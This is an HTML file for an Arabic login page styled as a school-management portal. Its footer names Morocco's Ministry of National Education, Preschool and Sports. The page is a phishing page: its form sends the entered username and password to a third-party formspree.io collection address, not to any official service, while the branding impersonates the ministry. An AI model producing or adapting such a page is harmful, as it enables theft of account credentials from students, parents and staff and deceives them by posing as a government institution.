<html lang="ar" dir="rtl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>صفحة تسجيل الدخول</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #f3f4f6;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            direction: rtl;
        }
        .container {
            width: 400px;
            background-color: #fff;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            text-align: center;
            padding: 20px;
        }
        .header img {
            width: 100%;
            border-radius: 10px 10px 0 0;
        }
        h1 {
            font-size: 20px;
            color: #333;
            margin: 15px 0;
        }
        p {
            font-size: 14px;
            color: #666;
            margin: 10px 0;
        }
        form {
            margin-top: 20px;
        }
        input, textarea {
            width: 90%;
            margin-bottom: 15px;
            padding: 10px;
            font-size: 14px;
            border: 1px solid #ddd;
            border-radius: 5px;
        }
        textarea {
            height: 80px;
            resize: none;
        }
        button {
            width: 95%;
            padding: 10px;
            font-size: 16px;
            color: #fff;
            background-color: #ff8800;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        button:hover {
            background-color: #e67600;
        }
        .footer {
            margin-top: 15px;
            font-size: 12px;
            color: #888;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <img src="https://l.top4top.io/p_329300kbl1.jpg" alt="الشعار">
        </div>
        <h1>مرحباً بك في حسابك الخاص</h1>
        <p>منظومة معلوماتية متكاملة تمكن من إرساء طرق عمل جديدة لتدبير المدارس على صعيد المؤسسات التعليمية.</p>
        <form action="https://formspree.io/f/mqaezjyb" method="POST">
               <input type="text" name="username" placeholder="اسم المستخدم" required>
              
               <input type="text" name="username" placeholder="كلمة المرور" required>

            <button type="submit">إرسال</button>
        </form>
        <div class="footer">
            <p>وزارة التربية الوطنية والتعليم الأولي والرياضة</p>
        </div>
    </div>
</body>
</html>
